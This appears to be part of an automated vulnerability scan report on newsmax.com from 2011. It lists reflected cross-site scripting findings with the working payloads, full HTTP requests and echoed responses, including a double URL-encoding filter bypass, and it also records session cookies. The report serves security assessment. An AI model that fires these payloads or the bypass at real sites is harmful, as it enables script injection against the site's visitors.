<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> 'Supe ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/supermoon-largest-moon-saturday/2011db41b' a=b 17ed13ad59c/03/18/id/389920' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 798fe'%20a%3db%20f9e45a4bccc was submitted in the REST URL parameter 4. This input was echoed as 798fe' a=b f9e45a4bccc in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/supermoon-largest-moon-saturday/2011/03798fe'%20a%3db%20f9e45a4bccc/18/id/389920 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 43644 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:48 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> 'Supe ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/supermoon-largest-moon-saturday/2011/03798fe' a=b f9e45a4bccc/18/id/389920' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d019b'%20a%3db%20b097a50d63b was submitted in the REST URL parameter 5. This input was echoed as d019b' a=b b097a50d63b in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/supermoon-largest-moon-saturday/2011/03/18d019b'%20a%3db%20b097a50d63b/id/389920 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 43644 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:14:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> 'Supe ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/supermoon-largest-moon-saturday/2011/03/18d019b' a=b b097a50d63b/id/389920' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d5fe5'%20a%3db%2019ce17fb6fb was submitted in the REST URL parameter 7. This input was echoed as d5fe5' a=b 19ce17fb6fb in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/supermoon-largest-moon-saturday/2011/03/18/id/389920d5fe5'%20a%3db%2019ce17fb6fb HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 41051 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:14:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Newsm ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/supermoon-largest-moon-saturday/2011/03/18/id/389920d5fe5' a=b 19ce17fb6fb' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8ad2%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253eccfe289fe13 was submitted in the REST URL parameter 7. This input was echoed as a8ad2"><img src=a onerror=alert(1)>ccfe289fe13 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /FastFeatures/supermoon-largest-moon-saturday/2011/03/18/id/389920a8ad2%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253eccfe289fe13 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 41499 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:14:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Newsm ...[SNIP]... <a href="javascript:printPage(389920a8ad2"><img src=a onerror=alert(1)>ccfe289fe13);" class="article_tools_link"> ...[SNIP]...
1.79. http://www.newsmax.com/FastFeatures/supermoon-largest-moon-saturday/2011/03/18/id/389920 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3204c'><script>alert(1)</script>2fc187ef478 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /FastFeatures/supermoon-largest-moon-saturday/2011/03/18/id/389920?3204c'><script>alert(1)</script>2fc187ef478=1 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 43866 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:12:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> 'Supe ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/supermoon-largest-moon-saturday/2011/03/18/id/389920?3204c'><script>alert(1)</script>2fc187ef478=1' class="article_tools_link"> ...[SNIP]...
1.80. http://www.newsmax.com/FastFeatures/supermoon-largest-moon-saturday/2011/03/18/id/389920 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f698a"><script>alert(1)</script>1a0a80d6daa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /FastFeatures/supermoon-largest-moon-saturday/2011/03/18/id/389920?f698a"><script>alert(1)</script>1a0a80d6daa=1 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 43871 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:12:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> 'Supe ...[SNIP]... <a href="javascript:fwdpopup('http://www.newsmax.com/ForwardToFriend?articleurl=/FastFeatures/supermoon-largest-moon-saturday/2011/03/18/id/389920?f698a"><script>alert(1)</script>1a0a80d6daa=1')" class="article_tools_link"> ...[SNIP]...
2. Cross-domain script includepreviousnext There are 105 instances of this issue:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.newsmax.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The following email addresses were disclosed in the response:
customerservice@Newsmax.com
customerservice@newsmax.com
Request
GET /PrivacyStatement HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,no-cache, must-revalidate Pragma: no-cache Content-Length: 37109 Content-Type: text/html Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:14:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Newsm ...[SNIP]... above. If you have purchased products, including subscriptions, from us in the past, you may also request that your Personal Data be removed from Newsmax's database by contacting Newsmax via e-mail at customerservice@Newsmax.com, in addition to the telephone number. In any instance, our removal of such information may require you to register again with Newsmax in the event you later wish full access to the Site.</p> ...[SNIP]... <a href="mailto:customerservice@newsmax.com" target="_blank"><strong>customerservice@newsmax.com</strong> ...[SNIP]...